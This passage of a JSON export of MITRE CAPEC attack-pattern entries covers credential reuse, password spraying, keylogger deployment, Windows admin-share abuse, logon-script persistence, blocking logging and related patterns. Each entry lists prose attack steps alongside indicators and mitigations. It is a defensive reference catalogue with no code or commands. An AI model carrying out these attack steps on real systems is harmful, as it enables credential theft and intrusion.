privileges."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1546.008","Entry_Name":"Event Triggered Execution:Accessibility Features"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, References, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"559":{"ID":"559","Name":"Orbital Jamming","Abstraction":"Detailed","Status":"Draft","Description":"In this attack pattern, the adversary sends disruptive signals at a target satellite using a rogue uplink station to disrupt the intended transmission. Those within the satellite\'s footprint are prevented from reaching the satellite\'s targeted or neighboring channels. The satellite\'s footprint size depends upon its position in the sky; higher orbital satellites cover multiple continents.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"601"}},"Prerequisites":{"Prerequisite":"This attack requires the knowledge of the satellite\'s coordinates for targeting."},"Resources_Required":{"Resource":"A satellite uplink station."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Other","Note":"A successful attack will deny the availability of the satellite communications for authorized users."}},"References":{"Reference":{"External_Reference_ID":"REF-462"}},"Content_History":{"Submission":{"Submission_Name":"Seamus Tuohy","Submission_Date":"2017-01-12"}}},"560":{"ID":"560","Name":"Use of Known Domain Credentials","Abstraction":"Meta","Status":"Stable","Description":{"p":["An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service. Attacks leveraging trusted credentials typically result in the adversary laterally moving within the local network, since users are often allowed to login to systems/applications within the network using the same password. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.","Attacks on known passwords generally rely on the primary fact that users often reuse the same username/password combination for a variety of systems, applications, and services, coupled with poor password policies on the target system or application. Adversaries can also utilize known passwords to target Single Sign On (SSO) or cloud-based applications and services, which often don\'t verify the authenticity of the user\'s input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data.","Successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"CanPrecede","CAPEC_ID":"151"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known credentials] The adversary must obtain known credentials in order to access the target system, application, or service.","Technique":["An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.","An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.","An adversary conducts a sniffing attack to steal credentials as they are transmitted.","An adversary gains access to a database and exfiltrates password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded credentials."]},{"Step":"2","Phase":"Explore","Description":"[Determine target\'s password policy] Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account)."]},{"Step":"3","Phase":"Experiment","Description":"[Attempt authentication] Try each credential until the target grants access.","Technique":"Manually or automatically enter each credential through the target\'s interface."},{"Step":"4","Phase":"Exploit","Description":"[Impersonate] An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within a system or application"},{"Step":"5","Phase":"Exploit","Description":"[Spoofing] Malicious data can be injected into the target system or into a victim user\'s system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks."},{"Step":"6","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can obtain sensitive data contained within the system or application."}]},"Prerequisites":{"Prerequisite":["The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target."]},"Skills_Required":{"Skill":["Once an adversary obtains a known credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A list of known credentials.","A custom script that leverages the credential list to launch an attack."]},"Indicators":{"Indicator":["Authentication attempts use credentials that have been used previously by the account in question.","Authentication attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations.","Data is being transferred and/or removed from systems/applications within the network.","Suspicious or Malicious software is downloaded/installed on systems within the domain.","Messages from a legitimate user appear to contain suspicious links or communications not consistent with the user\'s normal behavior."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.","Create a strong password policy and ensure that your system enforces this policy.","Ensure users are not reusing username/password combinations for multiple systems, applications, or services.","Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Monitor system and domain logs for abnormal credential access."]},"Example_Instances":{"Example":["Throughout 2015 and 2016, APT28 \u2014 also known as Pawn Storm, Sednit, Fancy Bear, Sofacy, and STRONTIUM \u2014 leveraged stolen credentials to infiltrate the Democratic National Committee (DNC), the United States Army, the World Anti-Doping Agency (WADA), the Court of Arbitration for Sport (TAS-CAS), and more. In most cases, the legitimate credentials were obtained via calculated spearphishing, tabnabbing, and DNS attacks targeted at corporate webmail systems. APT28 also executed several watering hole attacks, in addition to exploiting several zero-day vulnerabilities within Flash and Windows. The stolen credentials were then utilized to maintain authenticated access, laterally move within the local network, and exfiltrate sensitive information including DNC emails and personal medical records of numerous athletes. [REF-571]","In early 2019, FIN6 exploited stolen credentials from an organization within the engineering industry to laterally move within an environment via the Windows\u2019 Remote Desktop Protocol (RDP). Multiple servers were subsequently infected with malware to create malware distribution servers, which were used to distribute the LockerGoga ransomware. [REF-573]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"1273"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.001","Entry_Name":"Valid Accounts:Default Accounts"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.002","Entry_Name":"Valid Accounts:Domain Accounts"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1078.003","Entry_Name":"Valid Accounts:Local Accounts"}]},"References":{"Reference":[{"External_Reference_ID":"REF-570"},{"External_Reference_ID":"REF-571"},{"External_Reference_ID":"REF-572"},{"External_Reference_ID":"REF-573"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Abstraction, @Status, Consequences, Description, Example_Instances, Execution_Flow, Indicators, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"561":{"ID":"561","Name":"Windows Admin Shares with Stolen Credentials","Abstraction":"Detailed","Status":"Draft","Description":"An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain. Windows systems within the Windows NT family contain hidden network shares that are only accessible to system administrators. These shares allow administrators to remotely access all disk volumes on a network-connected system and further allow for files to be copied, written, and executed, along with other administrative actions. Example network shares include: C$, ADMIN$ and IPC$. If an adversary is able to obtain legitimate Windows credentials, the hidden shares can be accessed remotely, via server message block (SMB) or the Net utility, to transfer files and execute code. It is also possible for adversaries to utilize NTLM hashes to access administrator shares on systems with certain configuration and patch levels.","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"653"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"165"},{"Nature":"CanPrecede","CAPEC_ID":"549"},{"Nature":"CanPrecede","CAPEC_ID":"545"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Acquire known Windows administrator credentials] The adversary must obtain known Windows administrator credentials in order to access the administrative network shares.","Technique":["An adversary purchases breached Windows administrator credentials from the dark web.","An adversary leverages a key logger or phishing attack to steal administrator credentials as they are provided.","An adversary conducts a sniffing attack to steal Windows administrator credentials as they are transmitted.","An adversary gains access to a Windows domain system/files and exfiltrates Windows administrator password hashes.","An adversary examines outward-facing configuration and properties files to discover hardcoded Windows administrator credentials."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt domain authentication] Try each Windows administrator credential against the hidden network shares until the target grants access.","Technique":"Manually or automatically enter each administrator credential through the target\'s interface."},{"Step":"3","Phase":"Exploit","Description":"[Malware Execution] An adversary can remotely execute malware within the administrative network shares to infect other systems within the domain."},{"Step":"4","Phase":"Exploit","Description":"[Data Exfiltration] The adversary can remotely obtain sensitive data contained within the administrative network shares."}]},"Prerequisites":{"Prerequisite":["The system/application is connected to the Windows domain.","The target administrative share allows remote use of local admin credentials to log into domain systems.","The adversary possesses a list of known Windows administrator credentials that exist on the target domain."]},"Skills_Required":{"Skill":["Once an adversary obtains a known Windows credential, leveraging it is trivial.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A list of known Windows administrator credentials for the targeted domain."},"Indicators":{"Indicator":["Data is being transferred and/or removed from administrative network shares.","Suspicious or Malicious software is executed within administrative network shares.","Suspicious or Malicious software is downloaded/installed on systems within the domain."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Do not reuse local administrator account credentials across systems.","Deny remote use of local admin credentials to log into domain systems.","Do not allow accounts to be a local administrator on more than one system."]},"Example_Instances":{"Example":["APT32 has leveraged Windows\' built-in Net utility to use Windows Administrative Shares to copy and execute remote malware. [REF-579]","In May 2017, APT15 laterally moved within a Windows domain via Windows Administrative Shares to copy files to and from compromised host systems. This further allowed for the remote execution of malware. [REF-578]"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"308"},{"CWE_ID":"309"},{"CWE_ID":"294"},{"CWE_ID":"263"},{"CWE_ID":"262"},{"CWE_ID":"521"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1021.002","Entry_Name":"Remote Services:SMB/Windows Admin Shares"}},"References":{"Reference":[{"External_Reference_ID":"REF-577"},{"External_Reference_ID":"REF-578"},{"External_Reference_ID":"REF-579"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Execution_Flow, Indicators, Mitigations, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"562":{"ID":"562","Name":"Modify Shared File","Abstraction":"Detailed","Status":"Draft","Description":"An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Mitigations":{"Mitigation":"Disallow shared content. Protect shared folders by minimizing users that have write access. Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1080","Entry_Name":"Taint shared content"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}}},"563":{"ID":"563","Name":"Add Malicious File to Shared Webroot","Abstraction":"Detailed","Status":"Draft","Description":"An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Mitigations":{"Mitigation":"Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"564":{"ID":"564","Name":"Run Software at Logon","Abstraction":"Detailed","Status":"Draft","Description":"Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"542"}},"Mitigations":{"Mitigation":"Restrict write access to logon scripts to necessary administrators."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1037","Entry_Name":"Boot or Logon Initialization Scripts"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1543.001","Entry_Name":"Create or Modify System Process:Launch Agent"},{"Taxonomy_Name":"ATTACK","Entry_ID":"1547","Entry_Name":"Boot or Logon Autostart Execution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"565":{"ID":"565","Name":"Password Spraying","Abstraction":"Detailed","Status":"Draft","Description":{"p":["In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target\'s complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout. Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.","Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.","Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets."]},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target\'s password policy] Determine the password policies of the target system/application.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Explore","Description":"[Select passwords] Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)","Technique":["Select passwords based on common use or a particular user\'s additional details.","Select passwords based on the target\'s password complexity policies."]},{"Step":"3","Phase":"Exploit","Description":"[Brute force password] Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.","Technique":["Manually or automatically enter the first password for each known user account through the target\'s interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.","Iterate through the remaining passwords for each known user account."]}]},"Prerequisites":{"Prerequisite":["The system/application uses one factor password based authentication.","The system/application does not have a sound password policy that is being enforced.","The system/application does not implement an effective password throttling mechanism.","The adversary possesses a list of known user accounts on the target system/application."]},"Skills_Required":{"Skill":["A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available.",{"Level":"Low"}]},"Resources_Required":{"Resource":["A machine with sufficient resources for the job (e.g. CPU, RAM, HD).","Applicable password lists.","A password cracking tool or a custom script that leverages the password list to launch the attack."]},"Indicators":{"Indicator":["Many invalid login attempts are coming from the same machine (same IP address) or for multiple user accounts within short succession.","The login attempts use passwords that have been used previously by the user account in question.","Login attempts are originating from IP addresses or locations that are inconsistent with the user\'s normal IP addresses or locations."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authentication"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Authorization"],"Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Create a strong password policy and ensure that your system enforces this policy.","Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.","Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network."]},"Example_Instances":{"Example":["A user selects the phrase \\"Password123\\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.","The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.003","Entry_Name":"Brute Force:Password Spraying"}},"References":{"Reference":[{"External_Reference_ID":"REF-565"},{"External_Reference_ID":"REF-566"},{"External_Reference_ID":"REF-567"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-07-30"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}}},"568":{"ID":"568","Name":"Capture Credentials via Keylogger","Abstraction":"Detailed","Status":"Draft","Description":"An adversary deploys a keylogger in an effort to obtain credentials directly from a system\'s user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"569"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine which user\'s credentials to capture] Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of."},{"Step":"2","Phase":"Experiment","Description":"[Deploy keylogger] Once a user is identified, an adversary will deploy a keylogger to the user\'s system in one of many ways.","Technique":["Send a phishing email with a malicious attachment that installs a keylogger on a user\'s system","Conceal a keylogger behind fake software and get the user to download the software","Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge","Gain access to the user\'s system through a vulnerability and manually install a keylogger"]},{"Step":"3","Phase":"Experiment","Description":"[Record keystrokes] Once the keylogger is deployed on the user\'s system, the adversary will record keystrokes over a period of time."},{"Step":"4","Phase":"Experiment","Description":"[Analyze data and determine credentials] Using the captured keystrokes, the adversary will be able to determine the credentials of the user.","Technique":["Search for repeated sequences that are following by the enter key","Search for repeated sequences that are not found in a dictionary","Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence"]},{"Step":"5","Phase":"Exploit","Description":"[Use found credentials] After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack"}]},"Prerequisites":{"Prerequisite":"The ability to install the keylogger, either in person or remote."},"Mitigations":{"Mitigation":"Strong physical security can help reduce the ability of an adversary to install a keylogger."},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1056.001","Entry_Name":"Input Capture:Keylogging"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"569":{"ID":"569","Name":"Collect Data as Provided by Users","Abstraction":"Standard","Status":"Draft","Description":"An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"514"},{"Exclude_ID":"515"}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1056","Entry_Name":"Input Capture"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"571":{"ID":"571","Name":"Block Logging to Central Repository","Abstraction":"Standard","Status":"Draft","Description":"An adversary may attempt to block indicators from leaving the host machine. In the case of network based reporting of indicators, an adversary may block traffic associated with reporting to prevent central station analysis. This may be accomplished by many means such as stopping a local process to creating a host-based firewall rule to block traffic to a specific server.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"515"}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1562.006","Entry_Name":"Impair Defenses:Indicator Blocking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}]}},"572":{"ID":"572","Name":"Artificially Inflate File Sizes","Abstraction":"Standard","Status":"Draft","Description":{"p":"An adversary modifies file contents by adding data to files for several reasons. Many different attacks could \u201cfollow\u201d this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity."},"Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"165"}},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Example_Instances":{"Example":{"p":"An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1027.001","Entry_Name":"Obfuscated Files or Information:Binary Padding"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE 